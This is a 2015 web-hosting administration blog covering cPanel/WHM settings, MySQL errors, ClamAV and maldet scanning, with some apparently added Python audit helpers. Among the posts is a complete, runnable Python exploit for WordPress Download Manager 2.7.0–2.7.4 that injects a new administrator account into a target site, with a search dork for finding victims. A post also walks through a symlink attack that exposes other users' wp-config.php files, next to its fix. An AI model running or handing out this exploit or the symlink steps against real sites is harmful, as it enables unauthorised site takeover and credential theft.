Wednesday, January 28, 2015

How to change a domain nameserver from squarespace to bluehost.

Yesterday I had to change a domain's nameservers from Squarespace to Bluehost. It took at least 4 hours to find out how ...

Why?

Point 1: When I pointed the nameservers to Bluehost and tried to attach my domain, it showed "verified" but still said "verification required".

Point 2: Squarespace is a prebuilt site builder like wix.com, so it has no upload option with which I could verify it.

Point 3: The other man who owned this domain before did not wish to give me the password of the old hosting.

Point 4: But he wanted to help me anyway ...

So what did I have to do ....

Just a trick ;) and it works perfectly ...


Monday, January 19, 2015

Increase Bandwidth for a domain

To increase the bandwidth you need to use WHM, not cPanel.

To do so, go to your WHM panel (http://serverhostname.com:2086) --> Limit Bandwidth Usage (under the 'Account Functions' section) --> select the domain and press 'Limit' --> increase the number and hit 'Change'.

To give the domain unlimited bandwidth, enter 'unlimited' in the box.

Hopefully that answers your question!

Sunday, January 18, 2015

How To Enable BoxTrapper In cPanel/WHM Server?

1) Log in to WHM.
2) Click on Tweak Settings [see image below]


3) Check/uncheck BoxTrapper Spam Trap under Email settings to enable/disable it. [see this image]

4) Save the settings.

That’s it!

How to enable SpamAssassin in cPanel/WHM

Spam filters are a very important part of any mail server. ServInt VPS accounts using the cPanel/WHM control panel come with SpamAssassin as part of the standard installation, and the default configuration has SpamAssassin enabled.

If you need to re-enable SpamAssassin:

  • In WHM, under Server Configuration at the top of the left-hand navigation bar, click on Tweak Settings.
  • Click the Mail tab.
  • Select On for "Enable SpamAssassin spam filter."
Note: ServInt recommends leaving "Enable BoxTrapper spam trap" set to Off.

To force all the users on your VPS to use SpamAssassin:
  • Scroll down the left-hand navigation bar in WHM to Service Configuration and click on Exim Configuration Manager.
  • Select the SpamAssassin tab.
  • Set "Spam Assassin: Forced Global ON" to On.
This will filter all of your email for spam. It will not, however, force your users to do anything with it after it is filtered. It will simply mark spam as spam, nothing more.

cPanel temporary URL not working

When accessing a cPanel temporary URL you sometimes get a 404 error, even though the cPanel account has been created and the website content uploaded to the server. The Apache error log shows an error like the one below:

File does not exist: /usr/local/apache/htdocs/~user

This happens when mod_userdir protection is enabled on the server. Apache's mod_userdir allows users to view their sites by entering a tilde (~) and their username in the URL on a specific host. For example, http://server-ip/~user/ brings up the domain of the user 'user'. The disadvantage of this feature is that any bandwidth used by that site is charged to the domain it is accessed under (in this case test.domain.com). mod_userdir protection prevents this from happening. You may, however, want to disable the protection on specific virtual hosts (generally shared SSL hosts). For the temporary URL to work, the nobody user has to be excluded from the mod_userdir restriction.
Log in to WHM as root and open Security Center >> Apache mod_userdir Tweak. Uncheck DefaultHost (nobody) and click Save. Try accessing the temporary URL now.

Note: Just type "user" in the left-hand search field and you get Apache mod_userdir ...

Wednesday, January 14, 2015

How to turn off php safe_mode off for a particular directory in a shared hosting environment?

Your service provider might have forgotten to tell you that you need to enable your user-defined php.ini configuration by adding this line to the .htaccess file in your public_html folder:

# Activates the php.ini config located in the main folder, also recursively for all subfolders
suPHP_ConfigPath /home/YOUR_CPANEL_USER_NAME/public_html

Obviously, replace YOUR_CPANEL_USER_NAME with your cPanel user name.
I'm assuming your server has the suPHP module (which is quite common nowadays).
BTW: the php.ini file needs to be in /home/YOUR_CPANEL_USER_NAME/public_html too, and inside it you should write:

safe_mode = Off

And remember that Safe Mode is deprecated in PHP 5.3.0 and is removed in PHP 6.0.0.
 

Saturday, January 10, 2015

Solutions for handling symlink attacks

1) He logs in to cPanel as a normal user at http://ip-address/cpanel, entering his login and password.
2) Then he opens File Manager (with hidden files, "dotfiles", shown) and creates a new .htaccess file with the following contents:
#.htaccess file source
Options Indexes FollowSymLinks
DirectoryIndex doesnt-metter.htm
AddType txt .php
AddHandler txt .php

#End of .htaccess file
3) Then he creates a symbolic link (soft link) to the top-level directory "/" with a Perl script, or just with a cron job, typing: "ln -s / topdir"
4) After that, he opens a browser, goes to http://server-ip/~his-home-dir/topdi.../wp-config.php and simply views the source of the page: all the data is shown as plain text (TXT). That's all. The user has been hacked.
-------------------------------------------------------------------------------------------------------
Solution:
1) Open your php.conf with your favourite editor: nano /usr/local/apache/conf/php.conf
2) Comment out: #AddType application/x-httpd-php5 .php5 .php4 .php .php3 .php2 .phtml
3) Add these lines (Apache does not allow a comment after a directive on the same line, so the comment goes on its own line):
# matches .php, .php2, .php3, .php4, .php5, .php6 and .phtml
<FilesMatch "\.ph(p[2-6]?|tml)$">
SetHandler application/x-httpd-php5
</FilesMatch>

4) Save your changes and close php.conf
5) Restart httpd by typing: /etc/init.d/httpd restart
6) Done

Why this works: <FilesMatch> sections from the server configuration are merged after .htaccess files, so the SetHandler above wins over the AddType/AddHandler lines in a user's .htaccess and .php files are never served as plain text.
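A defender-side check for the symlink trick described above, as an added example that is not part of the original post: it walks an account's home directory and reports every symlink whose resolved target lies outside that home. It builds a throwaway sample tree so it runs offline; on a server you would call audit_symlinks() on each /home/<user>.

```python
"""Audit an account's home directory for symlinks that escape it."""
import os
import tempfile


def audit_symlinks(home):
    """Return [(link_path, resolved_target)] for every symlink under `home`
    whose target resolves outside `home` (what "ln -s / topdir" creates)."""
    home = os.path.realpath(home)
    escapes = []
    # followlinks=False (the default): a link to "/" is listed but never
    # descended into, so the walk stays inside the account.
    for root, dirs, files in os.walk(home):
        for name in dirs + files:
            path = os.path.join(root, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([home, target]) != home:
                escapes.append((path, target))
    return escapes


def build_sample_tree():
    """Constructed sample: one benign link inside the account and one link
    to "/" in public_html. Returns the fake home directory."""
    base = tempfile.mkdtemp(prefix="symlink-audit-")
    home = os.path.join(base, "home", "victim")
    os.makedirs(os.path.join(home, "public_html"))
    with open(os.path.join(home, "public_html", "index.html"), "w") as fh:
        fh.write("hello\n")
    os.symlink("index.html", os.path.join(home, "public_html", "home.html"))
    os.symlink("/", os.path.join(home, "public_html", "topdir"))
    return home


if __name__ == "__main__":
    for link, target in audit_symlinks(build_sample_tree()):
        print("ESCAPE: %s -> %s" % (link, target))
```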

Friday, January 9, 2015

How do I fix the error “Mysql Server has gone away”?

The "MySQL server has gone away" error (error 2006) has two main causes and solutions:
  • The server timed out and closed the connection. To fix this, check that the "wait_timeout" MySQL variable in your my.cnf configuration file is large enough.
  • The server dropped an incorrect or too large packet. If mysqld gets a packet that is too large or incorrect, it assumes that something has gone wrong with the client and closes the connection. To fix this, increase the maximum packet size "max_allowed_packet" in my.cnf, e.g. set max_allowed_packet = 128M, then run sudo /etc/init.d/mysql restart.
For WAMP, edit my.ini instead, found under the WAMP bin > mysql directory.
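An added example (not from the original post) that reads the [mysqld] section of a my.cnf and reports whether the two settings above are large enough for the application's largest packet and longest idle period. The sample config is constructed, and the fallback defaults used for missing keys are assumptions.

```python
import re

# MySQL-style size suffixes (K, M, G); a bare number is bytes.
SUFFIX = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def parse_size(value):
    """Turn '128M', '16777216' or '1G' into a byte count."""
    m = re.fullmatch(r"\s*(\d+)\s*([KMGkmg]?)\s*", value)
    if not m:
        raise ValueError("not a MySQL size: %r" % value)
    return int(m.group(1)) * SUFFIX[m.group(2).upper()]


def mysqld_settings(cnf_text):
    """Return key=value pairs from the [mysqld] section as a dict
    (comments stripped, dashes in option names normalised to underscores)."""
    settings, section = {}, None
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "mysqld" and "=" in line:
            key, _, val = line.partition("=")
            settings[key.strip().replace("-", "_")] = val.strip()
    return settings


def check_gone_away(cnf_text, largest_packet_bytes, longest_idle_seconds):
    """Return a list of problems: a packet limit below the largest query/blob
    the application sends, or a wait_timeout shorter than its longest idle
    period. Missing keys fall back to assumed defaults (4M and 28800s)."""
    s = mysqld_settings(cnf_text)
    problems = []
    packet = parse_size(s.get("max_allowed_packet", "4M"))
    if packet < largest_packet_bytes:
        problems.append("max_allowed_packet=%d bytes, need at least %d"
                        % (packet, largest_packet_bytes))
    wait = int(s.get("wait_timeout", "28800"))
    if wait < longest_idle_seconds:
        problems.append("wait_timeout=%ds, need at least %ds"
                        % (wait, longest_idle_seconds))
    return problems


# Constructed my.cnf sample with both values set too low for the check below.
SAMPLE_CNF = """# constructed sample
[client]
port = 3306

[mysqld]
wait_timeout = 60
max-allowed-packet = 16M
"""

if __name__ == "__main__":
    for p in check_gone_away(SAMPLE_CNF, 64 * 1024 ** 2, 600):
        print("[!]", p)
```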

Wednesday, January 7, 2015

Check for old plugins with exploit database...

Exploit Database :

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_exploit_text=&filter_port=0&filter_osvdb=&filter_cve=


CVE :

http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/Wordpress-Wordpress.html


WP SCAN

https://wpvulndb.com/ 

http://www.wordpressexploit.com/

http://wpsecure.net/

Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability

#!/usr/bin/python
#
# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
#
# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
#
# Exploit written by Claudio Viviani
#
#
# 2014-12-03:  Discovered vulnerability
# 2014-12-04:  Patch released (2.7.5)
#
# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
#
# function wpdm_ajax_call_exec()
# {
#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#             echo "function not defined!";
#         die();
#     }
# }
#
# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
#
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#         ...
#         ...
#         ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
#     (mixed) (required) An array of user data, stdClass or WP_User object.
#        Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wordpress-download"
#
# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
# File checks (checkfile below uses os, which the original forgot to import)
import os
import sys
# String manipulator
import string, random
# Args management
import optparse
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url
 
# Check if file exists and is readable
def checkfile(file):
    # either condition alone makes the file unusable, so this is "or", not "and"
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
 
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
banner = """
    ___ ___               __
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
   |:      |    ______      |__|              __                __
   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
               |.  |    |_____|________|__|__|__|_____|___._|_____|
               |:  1    /   ___ ___
               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
                           |. \_/  |___._|__|__|___._|___  |_____|__|
                           |:  |   |                 |_____|
                           |::.|:. |
                           `--- ---'
                                                   Wordpress Download Manager
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                          v2.7.0-2.7.4
 
                               Written by:
 
                             Claudio Viviani
 
                          http://www.homelab.it
 
                             info@homelab.it
                         homelabit@protonmail.ch
 
                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
host = checkurl(options.target)
timeout = options.timeout
 
print(banner)
 
socket.setdefaulttimeout(timeout)
 
username = id_generator()
pwd = id_generator()
 
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})
 
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
 
print "[+] Trying to connect to: "+host
try:
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()
 
    if html == "":
       print("[!] Account Added")
       print("[!] Location: "+host+"/wp-login.php")
       print("[!] Username: "+username)
       print("[!] Password: "+pwd)
    else:
       print("[X] Exploitation Failed :(")
 
except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))

Find vulnerable timthumb scripts anywhere on the server

find . -name "*thumb.php" -exec grep -H -n 'WEBSHOT_ENABLED' {} \;

or

find / -name '*.php' -exec grep WEBSHOT_ENABLED {} \;


To secure it, use:

define ('WEBSHOT_ENABLED', false);
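An added example, not part of the original posts or of either plugin, that serves both the Download Manager advisory above and the timthumb check: a small static audit of PHP source that flags (1) call_user_func()/call_user_func_array() whose callable comes straight from a request superglobal, which is the wpdm_ajax_call_exec() bug, and (2) a timthumb copy with WEBSHOT_ENABLED set to true. The vulnerable function is the one quoted in the advisory; the hardened shape and the timthumb fragment are constructed samples, and the allowlisted function names are invented.

```python
import re

# Heuristic: only a superglobal used directly as the callable is caught; an
# indirection through a local variable is not.
DYNAMIC_CALL = re.compile(
    r"call_user_func(?:_array)?\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")
WEBSHOT_ON = re.compile(
    r"""define\s*\(\s*['"]WEBSHOT_ENABLED['"]\s*,\s*true\s*\)""", re.IGNORECASE)


def audit_php(source):
    """Return (line_number, finding) tuples for the two patterns in `source`."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if DYNAMIC_CALL.search(line):
            findings.append((lineno, "user-controlled callable in call_user_func"))
        if WEBSHOT_ON.search(line):
            findings.append((lineno, "timthumb WEBSHOT_ENABLED is true"))
    return findings


# The vulnerable function as quoted in the advisory above.
VULNERABLE_WPDM = """<?php
function wpdm_ajax_call_exec()
{
    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
        if (function_exists($_POST['execute']))
            call_user_func($_POST['execute'], $_POST);
        else
            echo "function not defined!";
        die();
    }
}
"""

# A hardened shape (constructed, not the plugin's actual fix): function_exists()
# accepts any PHP or WordPress function, so dispatch only to an explicit allowlist.
HARDENED_WPDM = """<?php
function wpdm_ajax_call_exec()
{
    $allowed = array('wpdm_list_packages', 'wpdm_get_package');  // constructed names
    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
        $fn = isset($_POST['execute']) ? $_POST['execute'] : '';
        if (in_array($fn, $allowed, true))
            call_user_func($fn, $_POST);
        else
            echo "function not allowed!";
        die();
    }
}
"""

# Constructed timthumb.php fragment with the risky setting still on.
TIMTHUMB_SAMPLE = """<?php
define ('WEBSHOT_ENABLED', true);
define ('ALLOW_ALL_EXTERNAL_SITES', false);
"""

if __name__ == "__main__":
    for name, src in [("wpdm vulnerable", VULNERABLE_WPDM),
                      ("wpdm hardened", HARDENED_WPDM),
                      ("timthumb", TIMTHUMB_SAMPLE)]:
        print(name, audit_php(src))
```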

Saturday, January 3, 2015

Clamav Commands 4.1.2015

Terminal

First you have to update the virus definitions with:
sudo freshclam
Then you can scan for viruses:
 clamscan OPTIONS File/Folder 
If necessary, start with root permissions: sudo clamscan.
Examples:
  • To check all files on the computer, displaying the name of each file:
    clamscan -r /
  • To check all files on the computer, but only display infected files and ring a bell when found:
    clamscan -r --bell -i /
  • To check files in the all users home directories:
    clamscan -r /home
  • To check files in the USER home directory and move infected files to another folder:
    clamscan -r --move=/home/USER/VIRUS /home/USER
  • To check files in the USER home directory and remove infected files (WARNING: Files are gone.):
    clamscan -r --remove /home/USER
  • To see more options:
    clamscan --help 

    Source: http://askubuntu.com/questions/250290/how-do-i-scan-for-viruses-with-clamav 

Maldet Installation

Malware Detect is very easy to install on CentOS, regardless of the control panel you use (cPanel/WHM, DirectAdmin, etc.). Maldet, also known as Linux Malware Detect, is a malware scanner for Linux.
There is nothing complicated in the installation process, but root access to your server is required.

Installation via SSH

cd /usr/local/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xzf maldetect-current.tar.gz
cd maldetect-*
sh ./install.sh (or sudo sh ./install.sh)
maldet --update-ver
maldet --update


To scan a folder, for example /home, type maldet -a /home.

That's it!

Maldet Essential Commands

Syntax:

# maldet [options] /path/to/scan
 
Important switches of maldet:

1, -b, --background
Execute operations in the background, ideal for large scans
Example:
[root@crybit ~]# maldet -b -r /home/crybit/
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9922): {scan} launching scan of /home/crybit/ changes in last 7d to background, see /usr/local/maldetect/event_log for progress
 
 
2, -u, --update
Update malware detection signatures from rfxn.com

3, -d, --update-ver
Update the installed version from rfxn.com
Example:
[root@crybit ~]# maldet -d
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9997): {update} checking for available updates...
maldet(9997): {update} hashing install files and checking against server...
maldet(9997): {update} version check shows latest but hash check failed, forcing update...
maldet(9997): {update} completed update v1.4.2 => v1.4.2, running signature updates...
maldet(10289): {sigup} performing signature update check...
maldet(10289): {sigup} local signature set is version 201402051649
maldet(10289): {sigup} latest signature set already installed
maldet(9997): {update} update and config import completed.
 
4, -m, --monitor USERS|PATHS|FILE
Run maldet with inotify kernel-level file create/modify monitoring
If USERS is specified, monitor user homedirs for UIDs > 500
If FILE is specified, paths will be extracted from file, line spaced
If PATHS are specified, must be comma spaced list, NO WILDCARDS!
e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton

Example:
[root@crybit ~]# maldet -m /home/crybit/
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(10347): {mon} set inotify max_user_instances to 128
/usr/local/sbin/maldet: line 1162: /proc/sys/fs/inotify/max_user_instances: Permission denied
maldet(10347): {mon} set inotify max_user_watches to 0
/usr/local/sbin/maldet: line 1164: /proc/sys/fs/inotify/max_user_watches: Permission denied
maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
maldet(10347): {mon} inotify startup successful (pid: 10422)
maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log
 
5, -k, --kill
Terminate inotify monitoring service
Example:
[root@crybit ~]# maldet -k
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2
maldet(10471): {mon} sent kill to monitor service
 
6, -r, --scan-recent PATH DAYS
Scan files created/modified in the last X days (default: 7d, wildcard: ?)
e.g: maldet -r /home/?/public_html 2

7, -a, --scan-all PATH
Scan all files in path (default: /home, wildcard: ?)
e.g: maldet -a /home/?/public_html

8, -c, --checkout FILE
Upload suspected malware to rfxn.com for review & hashing into signatures

9, -l, --log
View maldet log file events.
Example:
[root@crybit ~]# maldet -l
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

Feb 06 02:38:28 jishnu maldet(10347): {mon} set inotify max_user_watches to 0
Feb 06 02:38:28 jishnu maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
Feb 06 02:38:28 jishnu maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify startup successful (pid: 10422)
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log
Feb 06 02:39:43 jishnu maldet(10471): {mon} sent kill to monitor service
Feb 06 02:40:00 jishnu maldet(10347): {mon} monitoring terminated by user, inotify killed.
Feb 06 02:41:00 jishnu maldet(10550): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:00 jishnu maldet(10550): {scan} building file list for /home/crybit/ of new/modified files from last 1 days, this might take awhile...
Feb 06 02:41:00 jishnu maldet(10550): {scan} scan returned zero results, please increase days range or provide a new path.
Feb 06 02:41:11 jishnu maldet(10615): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:11 jishnu maldet(10615): {scan} building file list for /home/crybit/ of new/modified files from last 2 days, this might take awhile...
Feb 06 02:41:11 jishnu maldet(10615): {scan} scan returned zero results, please increase days range or provide a new path.
10, -e, --report SCANID email
View scan report of most recent scan or of a specific SCANID and optionally e-mail the report to a supplied e-mail address.
e.g: maldet --report
e.g: maldet --report list
e.g: maldet --report 050910-1534.21135
e.g: maldet --report SCANID user@domain.com
11, -s, --restore FILE|SCANID
Restore file from quarantine queue to original path or restore all items from a specific SCANID
e.g: maldet --restore /usr/local/maldetect/quarantine/config.php.23754
e.g: maldet --restore 050910-1534.21135
12, -q, --quarantine SCANID
Quarantine all malware from report SCANID
e.g: maldet --quarantine 050910-1534.21135
13, -n, --clean SCANID
Try to clean & restore malware hits from report SCANID
e.g: maldet --clean 050910-1534.21135
14, -U, --user USER
Set execution under specified user, ideal for restoring from user quarantine or to view user reports.
e.g: maldet --user nobody --report
e.g: maldet --user nobody --restore 050910-1534.21135

15, -p, --purge
Clear logs, quarantine queue, session and temporary data.
That's it!!


Source : http://crybit.com/maldet-options/
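An added example, not from the original post or from maldet itself, that parses maldet log lines in the format shown under "maldet -l" above into structured events and summarises what a monitoring job would want to alert on. The sample log is copied from the page plus one constructed "scan completed" line whose wording is an assumption about maldet's output.

```python
import re
from collections import Counter

# "Feb 06 02:41:00 jishnu maldet(10550): {scan} signatures loaded: ..."
LOG_LINE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"maldet\((?P<pid>\d+)\): \{(?P<kind>\w+)\} (?P<msg>.*)$")
HITS = re.compile(r"malware hits (\d+)")  # assumed wording of the summary line


def parse_maldet_log(text):
    """Return one dict per line matching the maldet log format; the version
    banner and blank lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["pid"] = int(ev["pid"])
            events.append(ev)
    return events


def summarise(events):
    """Count events by kind and collect per-scan outcomes worth alerting on:
    scans that found hits, and scans that returned nothing (bad path or
    too short a day range, as the log text above says)."""
    by_kind = Counter(ev["kind"] for ev in events)
    hits, empty = {}, []
    for ev in events:
        if ev["kind"] != "scan":
            continue
        m = HITS.search(ev["msg"])
        if m and int(m.group(1)) > 0:
            hits[ev["pid"]] = int(m.group(1))
        elif "scan returned zero results" in ev["msg"]:
            empty.append(ev["pid"])
    return {"by_kind": dict(by_kind), "hits": hits, "empty_scans": empty}


SAMPLE_LOG = """Linux Malware Detect v1.4.2
Feb 06 02:38:28 jishnu maldet(10347): {mon} set inotify max_user_watches to 0
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify startup successful (pid: 10422)
Feb 06 02:39:43 jishnu maldet(10471): {mon} sent kill to monitor service
Feb 06 02:41:00 jishnu maldet(10550): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:00 jishnu maldet(10550): {scan} scan returned zero results, please increase days range or provide a new path.
Feb 06 02:41:11 jishnu maldet(10615): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:11 jishnu maldet(10615): {scan} scan returned zero results, please increase days range or provide a new path.
Feb 06 02:50:00 jishnu maldet(10700): {scan} scan completed on /home/crybit/: files 120, malware hits 2, cleaned hits 0
"""

if __name__ == "__main__":
    print(summarise(parse_maldet_log(SAMPLE_LOG)))
```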

Maldet Scan Command

Maldet Single Account Scan Command :

maldet --scan-all /home/domainname